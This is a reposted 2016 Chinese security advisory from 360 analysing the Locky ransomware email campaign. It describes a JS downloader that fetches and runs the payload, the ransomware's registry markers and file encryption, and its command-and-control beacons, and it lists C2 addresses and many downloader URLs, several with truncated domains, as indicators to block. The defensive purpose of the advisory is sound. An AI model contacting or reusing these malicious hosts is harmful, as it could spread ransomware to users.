Locky勒索软件潮来袭，请躲避

开启美好每一天 2016-03-21

展开全文

概述

自2月以来，360威胁情报中心监测到一大波勒索软件潮，国内单位组织陆续开始受到的冲击，公司对外的邮箱收到大量如下携带恶意附件的邮件。

邮件内容大致如下：

员工如不小心打开恶意附件，恶意软件会对外连接服务器下载组件，加密系统上的重要文件，要求用户付费解密。

样本行为分析

邮件附件为只有两个JS脚本的压缩包：

JS经过混淆，通过分析得知，受害者双击执行JS后创建MSXML2.XMLHTTP对象下载http:///euwiyr4hdc可执行文件，并通过WScript.Shell对象的run方法启动Locky主进程：

下载的exe经过大量的混淆处理：

进程启动后将机器ID写入HKEY_CURRENT_USER\Software\Locky\id，并将用到的加密公钥写入HKEY_CURRENT_USER\Software\Locky\pubkey：

随后木马开始遍历目录寻找.xls、.ppt、.doc、.wb2、.jpg、.wav等文件格式，使用RSA加密为Id+哈希.locky文件，并在存在文档得目录下写入恢复指导文档：

完成加密后将HKEY_CURRENT_USER\Software\Locky\completed设置为1，并通过加密的数据告知服务器：

如下是部分通信地址列表：

http://78.40.108.39/main.php

http://51.255.107.8/main.php

http://51.255.107.10/main.php

http://51.254.181.122/main.php

http://195.64.154.114/main.php

http://188.127.231.116/main.php

http://149.202.109.205/main.php

最后将桌面设置为恢复指导图，并弹出恢复指导文档，等待受害者交付赎金：

感染情况与建议

根据360威胁情报中心的数据，自3月以来确认中招的用户超过万人，淘宝上甚至已经出现协助代付款解密的服务。在此建议用户不要随意点击来源不明的邮件，目前360安全卫士已对此勒索软件做持续的查杀。

IOC

攻击者用于存放恶意代码的Downloader服务器大都是被攻陷的合法站点，以下是部分列表，请在边界设备上予以阻断。

http://1./engine/core/76tr5rguinml.exe

http://1./modules/images/87yhb54cdfy.exe

http://111.208.4.230:82/1Q2W3E4R5T6Y7U8I9O0P1Z2X3C4V5B//system/logs/76tr5rguinml.exe

http://120.52.72.52//c3pr90ntcsf0/system/logs/76tr5rguinml.exe

http://120.52.72.57//c3pr90ntcsf0/system/logs/4trf3g45.exe

http://178.33.176.229/ber.exe

http://2./img/multigaminator/4trf3g45.exe

http://50.28.211.199/hdd0/89o8i76u5y4

http://51457642.de./980k7j6h5

http:///wp-includes/rest-api/5h45hg4b

http:///4/0vexw3s5

http:///system/logs/086tg7

http:///87yg756f5.exe

http:///system/logs/98yhb764d.exe

http:///wp-content/plugins/87tg7v645c.exe

http:///87yg756f5.exe

http://anro./vqmod/vqcache/4trf3g45.exe

http:///system/logs/87tg7v645c.exe

http:///system/logs/765uy453gt5

http:///87yg756f5.exe

http:///libraries/simplepie/765g473bf34

http:///wp-includes/SimplePie/7ygvtyvb7niim.exe

http:///08o76g445g

http:///system/logs/87tg7v645c.exe

http:///image/templates/7ygvtyvb7niim.exe

http:///system/logs/7t6f65g.exe

http:///system/logs/87yhb54cdfy.exe

http:///89ok8jhg

http:///system/logs/7ygvtyvb7niim.exe

http://biomir./system/logs/78tgh76.exe

http:///system/logs/76tr5rguinml.exe

http:///system/cache/223

http:///system/logs/7t6f65g.exe

http://c001456.aaa./system/logs/87yg756f5.exe

http://casewerkz./system/logs/87yhb54cdfy.exe

http:///system/logs/uy78hn654e.exe

http://ccac3323.com./0y7bf3r

http:///system/logs/uy78hn654e.exe

http:///system/logs/lkj87h.exe

http:///system/logs/76tr5rguinml.exe

http:///87yg756f5.exe

http:///wp-content/uploads/5h45hg4b

http:///system/logs/lkj87h.exe

http://cyberbuh./97kh65gh5

http://demo./87yg756f5.exe

http://demo./system/logs/87yhb54cdfy.exe

http://demo2./modules/payments/76tr5rguinml.exe

http://demo2./plugins/markitup/4trf3g45.exe

http:///system/logs/98yhb764d.exe

http:///system/logs/uy78hn654e.exe

http:///system/logs/76h5gf43wg54

http://donutes./system/logs/87yhb54cdfy.exe

http:///system/logs/uy78hn654e.exe

http:///system/logs/87tg7v645c.exe

http:///js/playstation4.exe

http://eiadmeodeda./8fjvimkel1/c987ah8j9ei1.php

http://e-journal./8y74hfb

http:///wp-content/themes/765g473bf34

http:///wp-admin/network/87hg8n54

http:///admin/model/87yhb54cdfy.exe

http://escortbayan./wp-content/plugins/hello123/89h8btyfde445.exe

http:///763fdvf

http://fashion-girl./catalog/controller/87hg8n54

http://fb7707vd./admin/language/4trf3g45.exe

http:///system/logs/87tg7v645c.exe

http://fkaouane./67uh54gb4

http:///87yg756f5.exe

http:///system/logs/87yhb54cdfy.exe

http:///system/logs/7t6f65g.exe

http://g200./system/logs/87yhb54cdfy.exe

http:///32tguynjk

http:///87yg756f5.exe

http://gladilki./system/library/a.exe

http:///87yg756f5.exe

http:///system/logs/7ygvtyvb7niim.exe

http:///system/logs/98yhb764d.exe

http:///system/logs/76tr5rguinml.exe

http://hkhc-shop./system/logs/87yg7g

http:///69.exe

http:///87yg756f5.exe

http:///system/logs/87jhg44g5

http:///69.exe

http:///80.exe

http:///system/logs/76tr5rguinml.exe

http:///system/logs/uy78hn654e.exe

http:///system/logs/4trf3g45.exe

http:///system/logs/76tr5rguinml.exe

http:///system/logs/98yhb764d.exe

http:///system/logs/7t6f65g.exe

http:///9uj8n76b5.exe

http://jewellery./system/logs/iu8y7g6b

http:///system/logs/87tg7v645c.exe

http:///69.exe

http:///80.exe

http:///76t2gr345

http://kiddyshop./image/data/87tg7v645c.exe

http:///7r5fyf6

http://kievelectric./art/media/87tg7v645c.exe

http:///87yg756f5.exe

http://kokoko./54g4

http:///system/logs/76tr5rguinml.exe

http://lahmar.choukri.perso./78hg4wg

http:///system/logs/78tgh76.exe

http:///system/logs/uy78hn654e.exe

http:///admin/controller/87yhb54cdfy.exe

http:///9uj8n76b5.exe

http:///system/logs/87tg7v645c.exe

http://liquor1./system/logs/7ygvtyvb7niim.exe

http:///wp-admin/js/765g473bf34

http:///system/logs/98yhb764d.exe

http:///adminka/templ/7ygvtyvb7niim.exe

http://mansolution./system/logs/7ygvtyvb7niim.exe

http:///978yhen2

http://maxbeauty./administrator/manifests/765g473bf34

http:///system/cache/111

http:///system/logs/uy78hn654e.exe

http:///o097jhg4g5

http:///system/logs/98yhb764d.exe

http:///system/logs/43d5f67n8

http:///system/logs/87yhb54cdfy.exe

http://nagrobkipelplin./modules/mod_wrapper/4trf3g45.exe

http:///system/logs/7t6f65g.exe

http:///87yg756f5.exe

http:///system/logs/987i6u5y4t

http:///system/logs/uy78hn654e.exe

http:///0954t4h45

http:///23r35y44y5

http:///system/logs/7ygvtyvb7niim.exe

http:///system/logs/23f3rf33.exe

http://ohbelleza./system/logs/87yhb54cdfy.exe

http:///system/logs/uy78hn654e.exe

http:///k7j6h5gf

http:///3/67t54cetvy

http://parturiencies3f9./76t2gr345

http://perfumy_alice.republika.pl/08h867g5

http:///87745g

http:///98h8n23r23

http:///system/logs/98yg7b

http:///system/logs/q32r45g54

http:///image/cache/7ygvtyvb7niim.exe

http:///system/logs/87tg7v645c.exe

http:///~pugmahons/56er5f6g7b

http://realvacantcolony./97adguwod/08h13rfi982y.php

http://regentsanctionbisexual./97adguwod/08h13rfi982y.php

http:///system/logs/lkj87h.exe

http:///wp-includes/theme-compat/765g473bf34

http:///2/87yv5cds

http:///system/logs/7ygvtyvb7niim.exe

http:///system/logs/43ghy8n

http:///wp-content/plugins/hello123/89h8btyfde445.exe

http:///system/logs/76tr5rguinml.exe

http://sales-teleselling./wp-includes/fonts/5h45hg4b

http:///67j5h5h4

http:///published/PD/87tg7v645c.exe

http:///system/logs/87tg7v645c.exe

http:///system/logs/76tr5rguinml.exe

http://shofukai.web./23rt54y56

http://shop./system/cache/111

http://shopphpmvc./system/logs/lkj87h.exe

http:///system/logs/7ygvtyvb7niim.exe

http:///system/logs/78tgh76.exe

http:///5/92buyv5

http:///vqmod/xml/76tr5rguinml.exe

http:///i876jh556h

http:///786u5h

http:///wp-admin/includes/i75rg456

http:///system/logs/4trf3g45.exe

http:///73tgbf334

http:///system/logs/uy78hn654e.exe

http:///system/logs/78tgh76.exe

http://srv35613./storage/plugins/76tr5rguinml.exe

http:///43dfg7hy

http:///system/logs/uy78hn654e.exe

http://stopmeagency./9uj8n76b5.exe

http:///78jh5h

http://store./system/logs/78tgh76.exe

http://sub4./system/logs/87tg7v645c.exe

http:///wp-content/plugins/hello123/89h8btyfde445.exe

http:///system/logs/76tr5rguinml.exe

http://surfcash./0o9k7jh55

http:///system/logs/98yt

http:///system/logs/87tg7v645c.exe

http:///admin/images/7ygvtyvb7niim.exe

http:///67j5hg

http:///system/logs/56y4g45gh45h

http:///vqmod/install/7ygvtyvb7niim.exe

http://test./sdideep/87hg8n54

http:///system/logs/87tg7v645c.exe

http:///bestylethai.com/43t3gh4

http:///45tg

http:///system/logs/4trf3g45.exe

http:///system/logs/98yhb764d.exe

http:///system/logs/7ygvtyvb7niim.exe

http:///69.exe

http:///80.exe

http:///system/logs/4trf3g45.exe

http:///vqmod/xml/87yhb54cdfy.exe

http:///system/logs/87yhb54cdfy.exe

http:///system/cache/.../1.exe

http:///43f

http://tradesolutions./8i76

http:///8i67uy4g

http:///v4v5g45hg.exe

http:///image/cache/87yhb54cdfy.exe

http:///system/logs/lkj87h.exe

http:///v4v5g45hg.exe

http://u1847./system/smsgate/7ygvtyvb7niim.exe

http://ubermensch./system/logs/87yhb54cdfy.exe

http:///system/logs/uy78hn654e.exe

http:///v4v5g45hg.exe

http://vfwuc./wp-content/uploads/5h45hg4b

http://vgp3./6/98yh8bb

http:///v4v5g45hg.exe

http:///69.exe

http:///80.exe

http://webmail./v4v5g45hg.exe

http:///v4v5g45hg.exe

http:///system/cache/111

http://workplace-communication./wp-includes/pomo/5h45hg4b

http://www./98o7kj56h

http://www./wp-includes/y78hiuok

http://www./wp-content/uploads/y78hiuok

http://www./system/logs/4trf3g45.exe

http://www./files/Fedex/fedex.exe

http://www./09y8j

http://www./templates/atomic/js/111.exe

http://www./files/sample.exe

http://www./98o7kj56h

http://www./9oi654gh3

http://www./873y4g7bf3

http://www./files/10003c.exe

http://www./7643grb

http://www./8y7hybigv

http://www./parallax/piatti/promt.exe

http://www./8i5ju4g34

http://www./087hg67

http://www./4ggh45yh45

http://www.:20480/4ggh45yh45

http://www./4ggh45yh45

http://www./0k6j6n4h4

http://www./system/logs/7ygvtyvb7niim.exe

http://www./system/logs/87tg7v645c.exe

http://www./k8j5h

http://www./system/logs/87tg7v645c.exe

http://www./system/logs/78tgh76.exe

http://www./system/cache/87yhb54cdfy.exe

http://www./0l9k7j6

http://www./wp-content/plugins/hello123/89h8btyfde445.exe

http://www./9oi86j5hg4

http://xn--80ahetikodul.xn--p1ai/system/logs/4trf3g45.exe

http://xn--b1afonddk2l.xn--p1ai/system/logs/7t6f65g.exe

http:///system/logs/uy78hn654e.exe

http://zarabotoknasayte.zz.mu/7/sh87hg5v4

本文由 360安全播报原创发布，如需转载请注明来源及本文地址。本文地址：http://bobao.360.cn/learning/detail/2804.html

本站是提供个人知识管理的网络存储空间，所有内容均由用户发布，不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息，谨防诈骗。如发现有害或侵权内容，请点击一键举报。

转藏分享

QQ空间 QQ好友新浪微博微信

献花（0） +1

来自：开启美好每一天 > 《网络IT》

举报/认领

0条评论

发表

请遵守用户评论公约

类似文章 更多

开启美好每一天

关注对话

TA的最新馆藏

如何快速创建基于Electron的windows应用
复制浏览器数据到excel中时较长数字串会变成科学计数法的解决办法
买个充电宝也翻车：关于小电流放电模式
绝对详解PHP 的imageTtfText()函数
比较舒服、好看的颜色代码 | 小笨分享站
Vue环境搭建+Vue第一个项目

喜欢该文的人也喜欢更多

热门阅读换一换